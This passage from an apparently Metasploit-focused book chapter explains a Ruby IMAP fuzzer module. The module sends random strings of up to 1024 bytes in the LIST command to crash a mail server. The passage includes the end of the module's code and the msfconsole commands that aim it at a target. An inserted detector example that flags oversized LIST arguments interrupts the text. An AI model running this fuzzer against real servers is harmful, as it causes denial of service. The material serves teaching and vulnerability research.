Creating Your Own Exploits
      res = raw_send_recv(req)
      if !res.nil?
        print_status(res)
      else
        print_status("Server crashed, no response")
        break
      end
      disconnect()
    end
  end
end
The fuzzer module begins by importing the IMAP and denial-of-service
mixins. Including IMAP gives you the required login functionality, and since
the goal of the fuzzer is to crash the server, this module results in a denial
of service.
The fuzz string (the malformed data we want to send) is set as a randomized
string of alphanumeric characters with a maximum length of 1024 bytes.
The fuzzer connects and logs into the remote service, and if it fails to
connect and the loop breaks, you have something worth investigating. The
lack of response by the server might mean that you've successfully caused an
exception in the remote service.
The variable fuzzed is set to the random string generated by the
Framework, and the malicious request is built according to the published
exploit code by appending the malicious data to the vulnerable LIST command.
If the fuzzer doesn't receive a response from the server, it prints the
message "Server crashed, no response" and quits.
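Seen from the server side, the traffic this fuzzer produces is a LIST command carrying an unusually long argument. The following Ruby code is an added example, not code from the book or from Metasploit; the function names, the 255-byte threshold, and the sample command lines are assumptions constructed for illustration.

```ruby
# Added example: flag IMAP LIST commands whose arguments are far longer than
# any legitimate mailbox name. Threshold and sample lines are assumptions.

MAX_ARG_LEN = 255 # assumed policy; tune to the longest real mailbox path

# Split a client line into tag, command and raw argument text.
# Returns nil for lines that are not "tag COMMAND [args]".
def parse_imap_command(line)
  m = /\A(\S+) ([A-Za-z]+)(?: (.*))?\z/.match(line.chomp)
  return nil unless m
  { tag: m[1], command: m[2].upcase, args: m[3] || "" }
end

# Return the longest quoted string or bare atom found in the arguments.
def longest_argument(args)
  tokens = args.scan(/"((?:[^"\\]|\\.)*)"|([^\s()"]+)/).map { |q, a| q || a }
  tokens.max_by(&:bytesize) || ""
end

# Return one finding per LIST command whose longest argument exceeds max_len.
def suspicious_list_commands(lines, max_len = MAX_ARG_LEN)
  lines.each_with_index.map do |line, i|
    cmd = parse_imap_command(line)
    next unless cmd && cmd[:command] == "LIST"
    longest = longest_argument(cmd[:args])
    next if longest.bytesize <= max_len
    { line: i + 1, tag: cmd[:tag], length: longest.bytesize }
  end.compact
end

# Constructed client-to-server lines, as a proxy or capture might record them.
# The 1024-byte run of "A" stands in for a maximum-length fuzz string.
SAMPLE_LINES = [
  'a001 LOGIN test test',
  'a002 LIST "" "*"',
  'a003 LIST "" "INBOX/Archive/2010"',
  'a004 LIST "" "' + ("A" * 1024) + '"',
  'a005 SELECT INBOX'
].freeze

if __FILE__ == $PROGRAM_NAME
  suspicious_list_commands(SAMPLE_LINES).each do |f|
    puts "line #{f[:line]} tag #{f[:tag]}: LIST argument of #{f[:length]} bytes"
  end
end
```

Only the oversized request on the fourth sample line is reported; the ordinary LIST commands and the non-LIST commands pass.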
To test your new fuzzer, start up msfconsole, load the module, and set its
options as follows:
msf > use auxiliary/fuzzers/imap_fuzz
msf auxiliary(imap_fuzz) > show options

Module options:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   IMAPPASS                   no        The password for the specified username
   IMAPUSER                   no        The username to authenticate as
   RHOST                      yes       The target address
   RPORT     143              yes       The target port

msf auxiliary(imap_fuzz) > set IMAPPASS test
IMAPPASS => test
msf auxiliary(imap_fuzz) > set IMAPUSER test
IMAPUSER => test
msf auxiliary(imap_fuzz) > set RHOST 192.168.1.155
RHOST => 192.168.1.155
msf auxiliary(imap_fuzz) >